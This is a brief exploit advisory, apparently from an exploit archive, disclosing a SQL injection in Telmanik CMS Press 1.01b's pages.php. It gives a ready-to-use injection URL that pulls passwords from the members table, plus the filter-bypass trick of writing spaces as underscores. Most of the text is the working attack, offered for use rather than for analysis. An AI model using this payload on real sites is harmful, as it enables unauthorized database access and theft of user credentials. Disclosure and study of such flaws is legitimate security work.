Telmanik CMS Press version 1.01b suffers from a remote SQL injection vulnerability in pages.php.
85f94ea9cab330c2a49df8176d99d6957108fa4f82dfd45fb569414eb62cc04a
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: SQL Injection
[x] Vendor: www.telmanik.com
[x] Script Name: Telmanik CMS Press
[x] Script Version: 1.01b
[x] Script DL:
http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip
[x] Author: Anarchy Angel
[x] Mail : anarchy[at]dc414[dot]org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://site.org/themes/pages.php?page_name=[SQLi]
you have to formate you injection like so:
union_select_row_from_table
Replacing spaces with �_�.
Ex:
http://site.org/themes/pages.php?page_name=union_select_password_from_members
This is a special DefCon 21 kick off from me! See ya there [image: ;)]
Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny